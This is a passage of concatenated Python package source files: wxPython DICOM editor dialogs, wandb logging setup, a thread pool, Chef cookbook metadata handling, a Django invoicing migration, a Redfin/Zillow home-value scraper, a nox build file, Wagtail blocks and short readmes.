self.note = wx.StaticText(self, wx.ID_ANY, "NOTE: The loaded DICOM file(s) may not have the selected tag.")
# Create table for search results
columns = ['Keyword', 'Tag', 'VR']
data = {c: [''] for c in columns}
self.list_ctrl = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.data_table = DataTable(self.list_ctrl, data=data, columns=columns, widths=[-2, -2, -2])
# Create buttons
keys = {'select': wx.ID_OK, 'cancel': wx.ID_CANCEL}
self.button = {key: wx.Button(self, id_, key.capitalize()) for key, id_ in keys.items()}
self.__do_bind()
self.__do_layout()
self.run()
def __do_bind(self):
self.Bind(wx.EVT_TEXT, self.update, id=self.search_ctrl.GetId())
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_double_click, id=self.list_ctrl.GetId())
self.Bind(wx.EVT_LIST_COL_CLICK, self.data_table.sort_table, self.list_ctrl)
def __do_layout(self):
# Create sizers
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_main = wx.BoxSizer(wx.VERTICAL)
sizer_search = wx.BoxSizer(wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
# Add search bar and results table
sizer_search.Add(self.search_ctrl, 0, wx.EXPAND | wx.ALL, 5)
sizer_search.Add(self.note, 0, wx.EXPAND | wx.ALL, 5)
sizer_search.Add(self.list_ctrl, 1, wx.EXPAND | wx.ALL, 5)
sizer_main.Add(sizer_search, 1, wx.EXPAND | wx.ALL, 5)
# Add buttons
sizer_buttons.Add(self.button['select'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['cancel'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_main.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
# Add everything to window wrapper
sizer_wrapper.Add(sizer_main, 1, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.SetMinSize((700, 400))
self.Fit()
self.Center()
def run(self):
"""Open dialog, perform action if Select button is clicked, then close"""
self.update()
res = self.ShowModal()
if res == wx.ID_OK: # if user clicks Select button
self.set_tag_to_selection()
self.Destroy()
@property
def data_dict(self):
"""Get the DICOM Tag table data with current search_ctrl value"""
return self.search(self.search_ctrl.GetValue())
@property
def selected_tag(self):
"""Get the Tag of the currently selected/activated row in list_ctrl"""
selected_data = self.data_table.selected_row_data
if selected_data:
return selected_data[0][1]
def update(self, *evt):
"""Set the table date based on the current search_ctrl value"""
self.data_table.set_data(**self.data_dict)
def set_tag_to_selection(self):
"""Set the Group and Element list_ctrl values in the main app"""
tag = self.selected_tag
if tag:
self.parent.input['tag_group'].SetValue(tag.group)
self.parent.input['tag_element'].SetValue(tag.element)
self.parent.update_init_value()
self.parent.update_keyword()
def on_double_click(self, evt):
"""Treat double-click the same as selecting a row then clicking Select"""
self.set_tag_to_selection()
self.Close()
class TextViewer(wx.Dialog):
"""Simple dialog to display the LICENSE file and a brief text header in a scrollable window"""
def __init__(self, text, title, min_size):
wx.Dialog.__init__(self, None, title=title)
self.SetMinSize(min_size)
self.scrolled_window = wx.ScrolledWindow(self, wx.ID_ANY)
self.text = wx.StaticText(self.scrolled_window, wx.ID_ANY, text)
self.__set_properties()
self.__do_layout()
self.run()
def __set_properties(self):
self.scrolled_window.SetScrollRate(20, 20)
self.SetBackgroundColour(wx.WHITE)
def __do_layout(self):
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_text = wx.BoxSizer(wx.VERTICAL)
sizer_text.Add(self.text, 0, wx.EXPAND | wx.ALL, 5)
self.scrolled_window.SetSizer(sizer_text)
sizer_wrapper.Add(self.scrolled_window, 1, wx.EXPAND, 0)
self.SetSizer(sizer_wrapper)
self.Fit()
self.Center()
def run(self):
self.ShowModal()
self.Destroy()
class About(TextViewer):
"""Simple dialog to display the LICENSE file and a brief text header in a scrollable window"""
def __init__(self):
with open(LICENSE_PATH, 'r', encoding="utf8") as license_file:
license_text = ''.join([line for line in license_file])
license_text = "DVHA DICOM Editor v%s\nedit.dvhanalytics.com\n\n%s" % (__version__, license_text)
TextViewer.__init__(self, license_text, title='About DVHA DICOM Editor', min_size=(700, 500))
class DynamicValueHelp(TextViewer):
def __init__(self):
TextViewer.__init__(self, HELP_TEXT, title='Dynamic Values', min_size=(672, 420))
class AdvancedSettings(wx.Dialog):
def __init__(self, options):
wx.Dialog.__init__(self, None, title='User Settings')
self.options = options
key_map = {'dicom_prefix': 'Prefix:'}
self.combo_box = {key: wx.ComboBox(self, wx.ID_ANY, "") for key in key_map.keys()}
self.label = {key: wx.StaticText(self, wx.ID_ANY, value) for key, value in key_map.items()}
key_map = {'entropy_source': 'Entropy Source:', 'rand_digits': 'Digits:'}
self.text_ctrl = {key: wx.TextCtrl(self, wx.ID_ANY, "") for key in key_map.keys()}
for key, value in key_map.items():
self.label[key] = wx.StaticText(self, wx.ID_ANY, value)
self.button = {'ok': wx.Button(self, wx.ID_OK, 'OK'),
'cancel': wx.Button(self, wx.ID_CANCEL, 'Cancel')}
self.valid_prefix_pattern = re.compile(RE_VALID_UID_PREFIX)
self.__set_properties()
self.__do_bind()
self.__do_layout()
self.run()
def __set_properties(self):
self.combo_box['dicom_prefix'].SetItems(sorted(list(self.options.prefix_dict)))
self.combo_box['dicom_prefix'].SetValue(self.options.prefix)
self.text_ctrl['entropy_source'].SetValue(self.options.entropy_source)
self.text_ctrl['rand_digits'].SetValue(str(self.options.rand_digits))
self.SetMinSize((672, 210))
def __do_bind(self):
self.Bind(wx.EVT_TEXT, self.update_ok_enable, id=self.text_ctrl['rand_digits'].GetId())
self.Bind(wx.EVT_TEXT, self.update_ok_enable, id=self.combo_box['dicom_prefix'].GetId())
self.Bind(wx.EVT_COMBOBOX, self.update_ok_enable, id=self.combo_box['dicom_prefix'].GetId())
def __do_layout(self):
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_main = wx.BoxSizer(wx.VERTICAL)
sizer_dicom = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, "DICOM UID Generator"), wx.VERTICAL)
sizer_rand = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, "Random Number Generator"), wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
sizer_dicom.Add(self.label['dicom_prefix'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.combo_box['dicom_prefix'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.label['entropy_source'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.text_ctrl['entropy_source'], 0, wx.EXPAND, 0)
sizer_main.Add(sizer_dicom, 1, wx.EXPAND, wx.ALL, 5)
sizer_rand.Add(self.label['rand_digits'], 0, wx.EXPAND, 0)
sizer_rand.Add(self.text_ctrl['rand_digits'], 0, 0, 0)
sizer_main.Add(sizer_rand, 0, wx.EXPAND | wx.ALL, 0) # Has 5 border built-in???
sizer_buttons.Add(self.button['ok'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['cancel'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_main.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_wrapper.Add(sizer_main, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.Fit()
self.Layout()
self.Center()
def run(self):
if self.ShowModal() == wx.ID_OK:
self.apply_settings()
self.Destroy()
def apply_settings(self):
self.set_prefix()
self.set_entropy()
self.set_rand_digits()
def set_prefix(self):
self.options.prefix = self.prefix
def set_entropy(self):
self.options.entropy_source = self.text_ctrl['entropy_source'].GetValue()
def set_rand_digits(self):
self.options.rand_digits = int(self.text_ctrl['rand_digits'].GetValue())
def update_ok_enable(self, *evt):
self.button['ok'].Enable(self.is_input_valid)
@property
def is_input_valid(self):
return self.is_rand_digit_valid and self.is_prefix_valid
@property
def is_rand_digit_valid(self):
value = self.text_ctrl['rand_digits'].GetValue()
return value.isdigit() and 0 < int(value) <= 64
@property
def prefix(self):
new_value = self.combo_box['dicom_prefix'].GetValue()
if new_value in self.options.prefix_dict.keys():
new_value = self.options.prefix_dict[new_value] + '.'
return new_value
@property
def is_prefix_valid(self):
return self.valid_prefix_pattern.sub('', self.prefix) == '' | PypiClean |
/nvidia_modulus.launch-0.2.0-py3-none-any.whl/modulus/launch/logging/wandb.py | import logging
import os
import wandb
from typing import Literal
from pathlib import Path
from datetime import datetime
from wandb import AlertLevel
from modulus.distributed import DistributedManager
from .utils import create_ddp_group_tag
DEFAULT_WANDB_CONFIG = "~/.netrc"
logger = logging.getLogger(__name__)
_WANDB_INITIALIZED = False
def initialize_wandb(
project: str,
entity: str,
name: str = "train",
group: str = None,
sync_tensorboard: bool = False,
save_code: bool = False,
resume: str = None,
config=None,
mode: Literal["offline", "online", "disabled"] = "offline",
results_dir: str = None,
):
"""Function to initialize wandb client with the weights and biases server.
Parameters
----------
project : str
Name of the project to sync data with
entity : str,
Name of the wanbd entity
sync_tensorboard : bool, optional
sync tensorboard summary writer with wandb, by default False
save_code : bool, optional
Whether to push a copy of the code to wandb dashboard, by default False
name : str, optional
Name of the task running, by default "train"
group : str, optional
Group name of the task running. Good to set for ddp runs, by default None
resume: str, optional
Sets the resuming behavior. Options: "allow", "must", "never", "auto" or None,
by default None.
config : optional
a dictionary-like object for saving inputs , like hyperparameters.
If dict, argparse or absl.flags, it will load the key value pairs into the
wandb.config object. If str, it will look for a yaml file by that name,
by default None.
mode: str, optional
Can be "offline", "online" or "disabled", by default "offline"
results_dir : str, optional
Output directory of the experiment, by default "/<run directory>/wandb"
"""
# Set default value here for Hydra
if results_dir is None:
results_dir = str(Path("./wandb").absolute())
wandb_dir = results_dir
if DistributedManager.is_initialized() and DistributedManager().distributed:
if group is None:
group = create_ddp_group_tag()
start_time = datetime.now().astimezone()
time_string = start_time.strftime("%m/%d/%y_%H:%M:%S")
wandb_name = f"{name}_Process_{DistributedManager().rank}_{time_string}"
else:
start_time = datetime.now().astimezone()
time_string = start_time.strftime("%m/%d/%y_%H:%M:%S")
wandb_name = f"{name}_{time_string}"
if not os.path.exists(wandb_dir):
os.makedirs(wandb_dir)
wandb.init(
project=project,
entity=entity,
sync_tensorboard=sync_tensorboard,
name=wandb_name,
resume=resume,
config=config,
mode=mode,
dir=wandb_dir,
group=group,
save_code=save_code,
)
def alert(title, text, duration=300, level=0, is_master=True):
"""Send alert."""
alert_levels = {0: AlertLevel.INFO, 1: AlertLevel.WARN, 2: AlertLevel.ERROR}
if is_wandb_initialized() and is_master:
wandb.alert(
title=title, text=text, level=alert_levels[level], wait_duration=duration
)
def is_wandb_initialized():
"""Check if wandb has been initialized."""
global _WANDB_INITIALIZED
return _WANDB_INITIALIZED | PypiClean |
/TethysCluster-0.1.6.tar.gz/TethysCluster-0.1.6/tethyscluster/threadpool.py | import time
import Queue
import thread
import traceback
import workerpool
from tethyscluster import exception
from tethyscluster import progressbar
from tethyscluster.logger import log
class DaemonWorker(workerpool.workers.Worker):
"""
Improved Worker that sets daemon = True by default and also handles
communicating exceptions to the parent pool object by adding them to
the parent pool's exception queue
"""
def __init__(self, *args, **kwargs):
super(DaemonWorker, self).__init__(*args, **kwargs)
self.daemon = True
def run(self):
"Get jobs from the queue and perform them as they arrive."
while 1:
# Sleep until there is a job to perform.
job = self.jobs.get()
try:
job.run()
except workerpool.exceptions.TerminationNotice:
break
except Exception, e:
tb_msg = traceback.format_exc()
jid = job.jobid or str(thread.get_ident())
self.jobs.store_exception([e, tb_msg, jid])
finally:
self.jobs.task_done()
def _worker_factory(parent):
return DaemonWorker(parent)
class SimpleJob(workerpool.jobs.SimpleJob):
def __init__(self, method, args=[], kwargs={}, jobid=None,
results_queue=None):
self.method = method
self.args = args
self.kwargs = kwargs
self.jobid = jobid
self.results_queue = results_queue
def run(self):
if isinstance(self.args, list) or isinstance(self.args, tuple):
if isinstance(self.kwargs, dict):
r = self.method(*self.args, **self.kwargs)
else:
r = self.method(*self.args)
elif self.args is not None and self.args is not []:
if isinstance(self.kwargs, dict):
r = self.method(self.args, **self.kwargs)
else:
r = self.method(self.args)
else:
r = self.method()
if self.results_queue:
return self.results_queue.put(r)
return r
class ThreadPool(workerpool.WorkerPool):
def __init__(self, size=1, maxjobs=0, worker_factory=_worker_factory,
disable_threads=False):
self.disable_threads = disable_threads
self._exception_queue = Queue.Queue()
self._results_queue = Queue.Queue()
self._progress_bar = None
if self.disable_threads:
size = 0
workerpool.WorkerPool.__init__(self, size, maxjobs, worker_factory)
@property
def progress_bar(self):
if not self._progress_bar:
widgets = ['', progressbar.Fraction(), ' ',
progressbar.Bar(marker=progressbar.RotatingMarker()),
' ', progressbar.Percentage(), ' ', ' ']
pbar = progressbar.ProgressBar(widgets=widgets, maxval=1,
force_update=True)
self._progress_bar = pbar
return self._progress_bar
def simple_job(self, method, args=[], kwargs={}, jobid=None,
results_queue=None):
results_queue = results_queue or self._results_queue
job = SimpleJob(method, args, kwargs, jobid,
results_queue=results_queue)
if not self.disable_threads:
return self.put(job)
else:
return job.run()
def get_results(self):
results = []
for i in range(self._results_queue.qsize()):
results.append(self._results_queue.get())
return results
def map(self, fn, *seq, **kwargs):
"""
Uses the threadpool to return a list of the results of applying the
function to the items of the argument sequence(s). If more than one
sequence is given, the function is called with an argument list
consisting of the corresponding item of each sequence. If more than one
sequence is given with different lengths the argument list will be
truncated to the length of the smallest sequence.
If the kwarg jobid_fn is specified then each threadpool job will be
assigned a jobid based on the return value of jobid_fn(item) for each
item in the map.
"""
if self._results_queue.qsize() > 0:
self.get_results()
args = zip(*seq)
jobid_fn = kwargs.get('jobid_fn')
for seq in args:
jobid = None
if jobid_fn:
jobid = jobid_fn(*seq)
self.simple_job(fn, seq, jobid=jobid)
return self.wait(numtasks=len(args))
def store_exception(self, e):
self._exception_queue.put(e)
def shutdown(self):
log.info("Shutting down threads...")
workerpool.WorkerPool.shutdown(self)
self.wait(numtasks=self.size())
def wait(self, numtasks=None, return_results=True):
pbar = self.progress_bar.reset()
pbar.maxval = self.unfinished_tasks
if numtasks is not None:
pbar.maxval = max(numtasks, self.unfinished_tasks)
while self.unfinished_tasks != 0:
finished = pbar.maxval - self.unfinished_tasks
pbar.update(finished)
log.debug("unfinished_tasks = %d" % self.unfinished_tasks)
time.sleep(1)
if pbar.maxval != 0:
pbar.finish()
self.join()
exc_queue = self._exception_queue
if exc_queue.qsize() > 0:
excs = [exc_queue.get() for i in range(exc_queue.qsize())]
raise exception.ThreadPoolException(
"An error occurred in ThreadPool", excs)
if return_results:
return self.get_results()
def __del__(self):
log.debug('del called in threadpool')
self.shutdown()
self.join()
def get_thread_pool(size=10, worker_factory=_worker_factory,
disable_threads=False):
return ThreadPool(size=size, worker_factory=_worker_factory,
disable_threads=disable_threads) | PypiClean |
/pulp-cookbook-0.1.0b9.tar.gz/pulp-cookbook-0.1.0b9/pulp_cookbook/metadata.py |
import tarfile
import json
class CookbookMetadata:
"""
Represents metadata extracted from a cookbook tar archive.
Attributes:
metadata (dict): content of the 'metadata.json' file of a cookbook
"""
def __init__(self, metadata):
self.metadata = metadata
@property
def name(self):
return self.metadata["name"]
@property
def version(self):
return self.metadata["version"]
@property
def dependencies(self):
return self.metadata["dependencies"]
@classmethod
def from_cookbook_file(cls, fileobj, name):
"""
Construct a CookbookMetadata instance from a cookbook tar archive.
Args:
fileobj: file object of the cookbook tar archive
name (str): name of the cookbook ("metadata.json" file
is expected to be in the directoy `<name>`)
Returns:
CookbookMetadata: Instance containing the extracted metadata
"""
tf = tarfile.open(fileobj=fileobj)
for element in tf:
if element.isfile() and element.name == name + "/metadata.json":
metadata = json.load(tf.extractfile(element))
# TODO: check name consistency, raise error
return CookbookMetadata(metadata)
raise FileNotFoundError
class Entry:
"""
Universe entry: info about a cookbook in the universe file.
Attributes:
name (str): cookbook name
version (str): cookbook version
download_url (str): URL of cookbook tar package
dependencies (dict): cookbook dependencies
"""
def __init__(self, name, version, download_url, dependencies):
self.name = name
self.version = version
self.download_url = download_url
self.dependencies = dependencies
@property
def data(self):
return {
"location_type": "uri",
"location_path": self.download_url,
"download_url": self.download_url,
"dependencies": self.dependencies,
}
class Universe:
"""
Represents the cookbook universe.
Describes cookbooks contained within the directory.
Attributes:
relative_path (str): An relative path to the universe.
"""
def __init__(self, relative_path):
"""
Represents the cookbook universe.
Args:
relative_path (str): An relative path to the universe.
"""
self.relative_path = relative_path
def read(self):
"""
Read the universe file at `relative_path` and yield cookbook entries.
Yields: Entry: for each cookbook.
"""
with open(self.relative_path) as fp:
universe = json.load(fp)
for cookbook_name, cookbook_versions in universe.items():
for cookbook_version, cookbook_meta in cookbook_versions.items():
yield Entry(
cookbook_name,
cookbook_version,
cookbook_meta["download_url"],
cookbook_meta["dependencies"],
)
def write(self, entries):
"""
Write the universe JSON file.
Args:
entries (iterable): The entries to be written.
"""
universe = dict()
for entry in entries:
try:
versions = universe[entry.name]
except KeyError:
universe[entry.name] = versions = dict()
versions[entry.version] = entry.data
with open(self.relative_path, "w+") as fp:
json.dump(universe, fp) | PypiClean |
/django-invoicing-4.3.1.tar.gz/django-invoicing-4.3.1/invoicing/migrations/0017_auto_20180619_1349.py |
from django.db import migrations, models
import django_countries.fields
from internationalflavor.vat_number import VATNumberField
class Migration(migrations.Migration):
dependencies = [
('invoicing', '0016_update_credit_notes'),
]
operations = [
migrations.AddField(
model_name='invoice',
name='customer_email',
field=models.EmailField(blank=True, max_length=254),
),
migrations.AddField(
model_name='invoice',
name='customer_phone',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='invoice',
name='bank_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_country',
field=django_countries.fields.CountryField(blank=True, default='', max_length=2),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='constant_symbol',
field=models.CharField(blank=True, default='', max_length=64),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_registration_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_tax_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_vat_id',
field=VATNumberField(blank=True, default='', max_length=13),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='delivery_method',
field=models.CharField(default='PERSONAL_PICKUP', max_length=64),
),
migrations.AlterField(
model_name='invoice',
name='issuer_email',
field=models.EmailField(blank=True, default='', max_length=254),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='issuer_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='issuer_phone',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='note',
field=models.CharField(blank=True, default='Thank you for using our services.', max_length=255),
),
migrations.AlterField(
model_name='invoice',
name='reference',
field=models.CharField(blank=True, default='', max_length=140),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_country',
field=django_countries.fields.CountryField(blank=True, default='', max_length=2),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='status',
field=models.CharField(default='NEW', max_length=64),
),
migrations.AlterField(
model_name='invoice',
name='subtitle',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_registration_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_tax_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_vat_id',
field=VATNumberField(blank=True, default='', max_length=13),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='type',
field=models.CharField(default='INVOICE', max_length=64),
),
migrations.AlterField(
model_name='item',
name='unit',
field=models.CharField(default='PIECES', max_length=64),
),
] | PypiClean |
/real_estate_scrape-0.1.5-py3-none-any.whl/realestatescrape/__init__.py | import logging
import os
import re
from datetime import datetime, timezone
import matplotlib.pyplot as plt
import pandas as pd
import requests
from lxml import html
csvfile = "data.csv"
plotfile = "data.png"
sites = [
{
"name": "redfin",
"xpath": "//div[@class='statsValue']//span/text()",
},
{
"name": "zillow",
"xpath": (
# find the button containing "Zestimate"
"//button[contains(text(), 'Zestimate')]"
# find its parent
"/parent::node()"
# find its span descendent containing a "$"
"//span[contains(text(), '$')]/text()"
),
},
]
def get_page(url: str) -> bytes:
session = requests.Session()
# User-Agent required otherwise you get blocked
session.headers.update({"User-Agent": "Mozilla/5.0"})
if "SCRAPERAPI_KEY" in os.environ:
logging.info("Configuring requests session to use scraper API")
session.params = {
"api_key": os.environ["SCRAPERAPI_KEY"],
"url": url,
}
url = "http://api.scraperapi.com"
logging.info(f"Start getting {session.params['url']} via {url}")
else:
logging.info(f"Start getting {url=}")
response = session.get(url, timeout=60)
logging.info(f"Finish getting {url=}")
return response.content
def get_value(url: str, xpath: str) -> str:
page = get_page(url)
tree = html.fromstring(page)
try:
value = tree.xpath(xpath)[0]
return re.sub(r"[\$,\,]", "", value)
except IndexError:
logging.error(f"Could not find {xpath=} in {url=}")
logging.error(f"Last 1000 characters of page: {page[-1000:].decode()}")
raise
def retry_get_value(url: str, xpath: str, n: int = 3) -> str:
exceptions = 0
while exceptions < n:
logging.info(f"Start scrape {exceptions+1}/{n}: {url=} {xpath}")
try:
value = get_value(url, xpath)
logging.info(f"Finish scrape {exceptions+1}/{n}. {value=}")
return value
except Exception as e:
logging.error(f"Finish scrape {exceptions+1}/{n}. Failed: {e}")
exceptions += 1
return "NaN"
def ensure_csv() -> None:
"""Make sure a CSV with the appropriate header exists."""
expected_header = "date," + ",".join(site["name"] for site in sites) + "\n"
try:
with open(csvfile) as f:
header = next(f)
assert header == expected_header
except (FileNotFoundError, AssertionError):
with open(csvfile, mode="w") as f:
f.write(expected_header)
def append_csv(values) -> None:
# https://stackoverflow.com/a/28164131/409879
ensure_csv()
datetime_string = datetime.now(timezone.utc).astimezone().isoformat()
line = f"{datetime_string},{','.join(str(v[1]) for v in values)}\n"
with open(csvfile, mode="a") as f:
f.write(line)
def plot_file() -> None:
df = pd.read_csv(csvfile, index_col="date", parse_dates=True)
ax = df.plot()
ax.ticklabel_format(style="plain", axis="y") # no exponential notation on y-axis
ax.set_ylabel("Estimated value ($)")
ax.set_xlabel(f"Date (last updated {df.index[-1].date().isoformat()})")
ax.grid()
plt.rcParams["savefig.dpi"] = 144
ax.get_figure().savefig(plotfile, bbox_inches="tight")
def main():
logging.basicConfig(
level=logging.INFO, format="%(asctime)s %(levelname)-8s %(message)s"
)
values = []
for site in sites:
logging.info(f"Start getting {site['name']}")
try:
url = site["url"]
except KeyError:
url = os.environ[site["name"].upper() + "_URL"]
value = retry_get_value(url=url, xpath=site["xpath"])
logging.info(f"Finish getting {site['name']}. {value=}")
values.append((site["name"], value))
append_csv(values)
plot_file()
if __name__ == "__main__":
main() | PypiClean |
/hist-2.6.1.tar.gz/hist-2.6.1/noxfile.py | from __future__ import annotations
import shutil
import sys
from pathlib import Path
import nox
ALL_PYTHONS = ["3.7", "3.8", "3.9", "3.10"]
nox.options.sessions = ["lint", "tests"]
DIR = Path(__file__).parent.resolve()
@nox.session(reuse_venv=True)
def lint(session):
"""
Run the linter.
"""
session.install("pre-commit")
session.run("pre-commit", "run", "--all-files", *session.posargs)
@nox.session
def pylint(session: nox.Session) -> None:
"""
Run pylint.
"""
session.install("pylint")
session.install("-e", ".")
session.run("pylint", "src", *session.posargs)
@nox.session(python=ALL_PYTHONS, reuse_venv=True)
def tests(session):
"""
Run the unit and regular tests.
"""
session.install("-e", ".[test,plot]")
args = ["--mpl"] if sys.platform.startswith("linux") else []
session.run("pytest", *args, *session.posargs)
@nox.session
def regenerate(session):
"""
Regenerate MPL images.
"""
session.install("-e", ".[test,plot]")
if not sys.platform.startswith("linux"):
session.error(
"Must be run from Linux, images will be slightly different on macOS"
)
session.run("pytest", "--mpl-generate-path=tests/baseline", *session.posargs)
@nox.session(reuse_venv=True)
def docs(session):
"""
Build the docs. Pass "serve" to serve.
"""
session.install("-e", ".[docs]")
session.chdir("docs")
session.run("sphinx-build", "-M", "html", ".", "_build")
if session.posargs:
if "serve" in session.posargs:
print("Launching docs at http://localhost:8000/ - use Ctrl-C to quit")
session.run("python", "-m", "http.server", "8000", "-d", "_build/html")
else:
print("Unsupported argument to docs")
@nox.session
def build(session):
"""
Build an SDist and wheel.
"""
build_p = DIR.joinpath("build")
if build_p.exists():
shutil.rmtree(build_p)
session.install("build")
session.run("python", "-m", "build") | PypiClean |
/django_cos-0.4.0.tar.gz/django_cos-0.4.0/django_cos/blocks/metadata_blocks.py | import json
# Django Imports
from django import forms
from django.utils.translation import ugettext_lazy as _
# Wagtail Imports
from wagtail.core import blocks
# Django COS Imports
from django_cos import schema
from django_cos.blocks.base_blocks import MultiSelectBlock
class OpenHoursValue(blocks.StructValue):
"""
Renders selected days as a json list.
"""
@property
def days_json(self):
"""
Custom property to return days as json list instead of default python list.
"""
return json.dumps(self['days'])
class OpenHoursBlock(blocks.StructBlock):
"""
Holds day and time combination for business open hours.
"""
days = MultiSelectBlock(
required=True,
verbose_name=_('Days'),
help_text=_('For late night hours past 23:59, define each day in a separate block.'),
widget=forms.CheckboxSelectMultiple,
choices=(
('Monday', _('Monday')),
('Tuesday', _('Tuesday')),
('Wednesday', _('Wednesday')),
('Thursday', _('Thursday')),
('Friday', _('Friday')),
('Saturday', _('Saturday')),
('Sunday', _('Sunday')),
))
start_time = blocks.TimeBlock(verbose_name=_('Opening time'))
end_time = blocks.TimeBlock(verbose_name=_('Closing time'))
class Meta:
template = 'django_cos/blocks/struct_data_hours.json'
label = _('Open Hours')
value_class = OpenHoursValue
class StructuredDataActionBlock(blocks.StructBlock):
"""
Action object from schema.org
"""
action_type = blocks.ChoiceBlock(
verbose_name=_('Action Type'),
required=True,
choices=schema.SCHEMA_ACTION_CHOICES
)
target = blocks.URLBlock(verbose_name=_('Target URL'))
language = blocks.CharBlock(
verbose_name=_('Language'),
help_text=_('If the action is offered in multiple languages, create separate actions for each language.'),
default='en-US'
)
result_type = blocks.ChoiceBlock(
required=False,
verbose_name=_('Result Type'),
help_text=_('Leave blank for OrderAction'),
choices=schema.SCHEMA_RESULT_CHOICES
)
result_name = blocks.CharBlock(
required=False,
verbose_name=_('Result Name'),
help_text=_('Example: "Reserve a table", "Book an appointment", etc.')
)
extra_json = blocks.RawHTMLBlock(
required=False,
verbose_name=_('Additional action markup'),
classname='monospace',
help_text=_('Additional JSON-LD inserted into the Action dictionary. Must be properties of https://schema.org/Action.')
)
class Meta:
template = 'django_cos/blocks/struct_data_action.json'
label = _('Action') | PypiClean |
/odoo12_addon_website_event_crm-12.0.1.0.1-py3-none-any.whl/odoo/addons/website_event_crm/readme/CONFIGURE.rst | This module allows you to configure opportunity stages to enable some automations.
To advance automatically to the next stage when the opportunity is invited to view an event category on the website:
#. Go to *CRM > Sales > My pipeline*.
#. Hover over one stage name and click on its cogs icon.
#. Choose *Edit Stage*.
#. Enable *Invite automatically to website event category* if you want that
opportunities in that stage, which are related to an event category, get
periodically checked to see if there's a new event published in your website,
belonging to that category, and, if so, invited to check it out.
#. Enable *Advance stage automatically when inviting to website event category*
if you want that, when one of the opportunities in that stage is invited to
check out events published on your website, it advances automatically to the
next stage.
Important: If you don't want to invite automatically on loop, make sure to
enable both options if you enable the 1st one, and make sure the next stage is
not enabled to autonotify.
To configure the frequency of automated notifications:
#. Go to *Settings > Technical > Automation > Scheduled Actions >
Notify all opportunities related to event categories*.
#. Edit *Execute Every*.
Important: That only schedules mails, but they will be sent later when the
*Mail: Email Queue Manager* automated action is triggered. You can configure it
the same way.
| PypiClean |
/cihaidata-unihan-0.4.2.tar.gz/cihaidata-unihan-0.4.2/README.rst | *cihaidata-unihan* - tool to build `unihan`_ into `simple data format`
CSV format. Part of the `cihai`_ project.
